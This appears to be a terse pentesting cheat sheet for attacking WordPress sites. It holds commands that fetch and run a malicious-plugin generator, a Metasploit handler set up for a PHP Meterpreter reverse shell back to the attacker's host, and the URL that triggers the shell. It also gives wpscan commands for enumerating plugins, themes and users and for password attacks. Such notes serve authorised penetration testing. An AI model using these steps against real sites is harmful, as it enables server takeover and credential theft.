#
wordpress
By
#
Malicious WP Plugin
You must use Admin Account to upload new plugins
wget https://raw.githubusercontent.com/wetw0rk/malicious-wordpress-plugin/master/wordpwn.pypython wordpwn.py <$LOCAL_IP> <$LOCAL_PORT> YExecute MSFConsole with multi handler
use exploit/multi/handler
set LHOST <$LOCAL_IP>
set LPORT <$LOCAL_PORT>
set PAYLOAD php/meterpreter/reverse_tcp
exploitTo trigger the reverse shell, you need to go in the following URL
https://<$WORDPRESS_URL>/wp-content/plugins/malicious/wetw0rk_maybe.php
#
WPSCAN
#
Update wpscan
gem update wpscan
#
Basic Scan
wpscan --url xmaple.com --random-user-agent- Headers to discover server information
- Accessibility of xmlrpc.php
- Accessibility of wp-cron.php
- WordPress version
- Active theme and its basic information
- Active plugins and their basic information
- Discoverable Config backups
#
Options
Plugins Detector
-e vp
Themes Detector
-e vt
Users Enumeration
-e u
Passwords Attack
-passwords <path-wordlist>